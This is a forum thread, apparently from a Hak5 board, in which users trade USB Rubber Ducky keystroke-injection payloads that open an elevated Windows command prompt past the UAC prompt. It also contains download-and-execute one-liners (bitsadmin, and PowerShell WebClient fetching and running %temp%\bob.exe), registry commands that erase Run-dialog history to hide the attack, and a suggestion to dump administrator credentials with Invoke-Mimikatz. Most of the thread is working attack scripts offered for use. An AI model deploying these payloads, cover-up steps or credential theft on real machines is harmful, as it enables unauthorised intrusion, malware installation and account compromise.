Darren Kitchen Posted August 19, 2013 Share Posted August 19, 2013 The duck is pretty good at bypassing UAC. Let's make it better. REM ********************************* REM Payload: Old Method to Bypass UAC REM Target: Window 7 REM Author: Darren Kitchen REM ********************************* GUI DELAY 500 STRING cmd DELAY 3000 MENU DELAY 2000 STRING a REM ************************************************************* REM Depending on Windows Version an ENTER could be necessary here REM ************************************************************* DELAY 3000 LEFT ENTER DELAY 500 STRING echo Admin Prompt in 9 seconds Not bad. Let's shave another 2 seconds off... REM ******************************** REM Payload: Less Finicky UAC Bypass REM Target: Window 7 REM Author: Darren Kitchen REM ******************************** GUI r DELAY 500 STRING cmd ENTER DELAY 500 STRING copy con sudo.cmd ENTER STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs ENTER STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs ENTER STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs ENTER STRING @cscript %temp%\sudo.tmp.vbs ENTER CTRL z ENTER STRING sudo.cmd cmd ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 7 seconds Not bad. Let's shave another 2 seconds off... REM ******************************************** REM Payload: Fastest UAC Bypass using Powershell REM Target: Window 7 REM Author: Darren Kitchen REM ******************************************** GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 5 seconds Not bad. Let's shave another 2 seconds off...? Thoughts? Quote Link to comment Share on other sites More sharing options...
strangelaw Posted August 19, 2013 Share Posted August 19, 2013 (From Brutelogic) -> bitsadmin /transfer n http://domain/file c:\%homepath%\file && c:\%homepath%\file Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted August 19, 2013 Author Share Posted August 19, 2013 BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. Which is why.... powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'); Start-Process "%temp%\bob.exe" However cool, it still doesn't open a command prompt bypassing UAC. Quote Link to comment Share on other sites More sharing options...
overwraith Posted August 19, 2013 Share Posted August 19, 2013 I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn off procedure though. http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/ Quote Link to comment Share on other sites More sharing options...
nikkelitous Posted August 20, 2013 Share Posted August 20, 2013 I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn off procedure though. http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/ Unfortunately, this method requires a reboot. Though it does completely disable UAC rather than just a one off. Quote Link to comment Share on other sites More sharing options...
BuckoA51 Posted August 20, 2013 Share Posted August 20, 2013 The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff). Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted August 20, 2013 Author Share Posted August 20, 2013 The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff). Emphasis mine. Quote Link to comment Share on other sites More sharing options...
411Hall Posted August 26, 2013 Share Posted August 26, 2013 Good stuff! I have replaced the Toolkits method with this one. Quote Link to comment Share on other sites More sharing options...
BuckoA51 Posted August 30, 2013 Share Posted August 30, 2013 Emphasis mine. Too true Darren I know, last company I was at doing a quick audit, they had Windows 7 and half the staff were running as admin with UAC on, the other half as admin with UAC disabled, because, you know, it's such a bind to click "Yes" every now and again. Quote Link to comment Share on other sites More sharing options...
tom564 Posted September 5, 2013 Share Posted September 5, 2013 REM ******************************** REM Payload: Less Finicky UAC Bypass REM Target: Window 7 REM Author: Darren Kitchen REM ******************************** GUI r DELAY 500 STRING cmd ENTER DELAY 500 STRING copy con sudo.cmd ENTER STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs ENTER STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs ENTER STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs ENTER STRING @cscript %temp%\sudo.tmp.vbs ENTER CTRL z ENTER STRING sudo.cmd cmd ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 7 seconds Not bad. Let's shave another 2 seconds off... REM ******************************************** REM Payload: Fastest UAC Bypass using Powershell REM Target: Window 7 REM Author: Darren Kitchen REM ******************************************** GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING echo Admin Prompt in 5 seconds Not bad. Let's shave another 2 seconds off...? Thoughts? Having powershell Start-Process cmd.exe -Verb runAs as the last run command in the run prompt would make me suspicious if i saw it, is there any way you can clean up after to remove the obvious trace? Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted September 6, 2013 Share Posted September 6, 2013 You can delete the entire history from the Run dialog using reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f or, you can specify what exact command you want removed with this: for /f "tokens=1 delims= " %%A in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ^| findstr "powershell Start-Process cmd.exe -Verb RunAs"') do (reg delete HKCU\Software\Microsoft\Windows\CUrrentVersion\Explorer\RunMRU /v %%A /f) or change "powershell Start-Process cmd.exe -Verb RunAs" to anything you like. Quote Link to comment Share on other sites More sharing options...
SN4T14 Posted September 11, 2013 Share Posted September 11, 2013 (edited) CONTROL ESCAPE DELAY 200 STRING cmd CTRL-SHIFT ENTER DELAY 2800 ALT y Another 2 seconds shaved off. ;) Edit: Better version using run menu, should work when there's a lot of entries in the start menu, and doesn't put an unnecessary "y" in the CMD window if UAC is off. GUI R DELAY 200 STRING runas /profile /user:%COMPUTERNAME%\Administrator "cmd" ENTER DELAY 2700 ALT y DELAY 100 BACKSPACE Edited September 12, 2013 by SN4T14 Quote Link to comment Share on other sites More sharing options...
crackruckles Posted September 16, 2013 Share Posted September 16, 2013 Press the Win keyboard key or click on Vista Start button. Type cmd into the Start Search textbox. Press Ctrl+Shift+Enter keyboard shortcut. Ctrl-Shift-Enter is the general keyboard shortcut that triggers elevation to “Run as Administrator”. Press Alt+C or press Continue to confirm the UAC elevation warning prompt. http://www.mydigitallife.info/how-to-open-elevated-command-prompt-with-administrator-privileges-in-windows-vista/ Quote Link to comment Share on other sites More sharing options...
factgasm Posted December 3, 2013 Share Posted December 3, 2013 The CTRL+SHIFT+ENTER combo works on the keyboard but how do you code that in Ducky Script? Can Ducky Script handle three keys being pressed simultaneously? I tried this script earlier and it didn't work: DEFAULTDELAY 50DELAY 3000CONTROL ESCAPESTRING cmdCONTROL SHIFT ENTERALT YEXIT Quote Link to comment Share on other sites More sharing options...
googleknowsbest Posted December 19, 2013 Share Posted December 19, 2013 Dialogue box is not highlighted before the ALT y Win 8 Quote Link to comment Share on other sites More sharing options...
Plazmaz Posted August 19, 2014 Share Posted August 19, 2014 (edited) You should be able to use this on windows 8.1: GUI X DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN DOWN ENTER ALT y Edited August 22, 2014 by Plazmaz Quote Link to comment Share on other sites More sharing options...
MB60893 Posted September 6, 2014 Share Posted September 6, 2014 Firstly, when you refer to "Bypass" UAC, what you are really saying is don't bring up the dialog box saying "Do you want to run xyz program as Administrator?". What I think would be better is to get administrator rights from a guest users' perspective, just about guaranteeing that any program would work if you needed to execute it. If I knew someone who was an administrator, I would simply write a ducky script using the CTRL-SHIFT-ENTER command to elevate Powershell, then use the "Invoke-Mimikatz" command with "-DumpCreds". This would output the administrator password for the computer (providing it is not a Windows 8/8.1 machine). I know there is a way you can execute a task as another user... so if you knew the administrator password for a computer, you could simply rock up as a guest, and run the task as an admin user. Thoughts? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.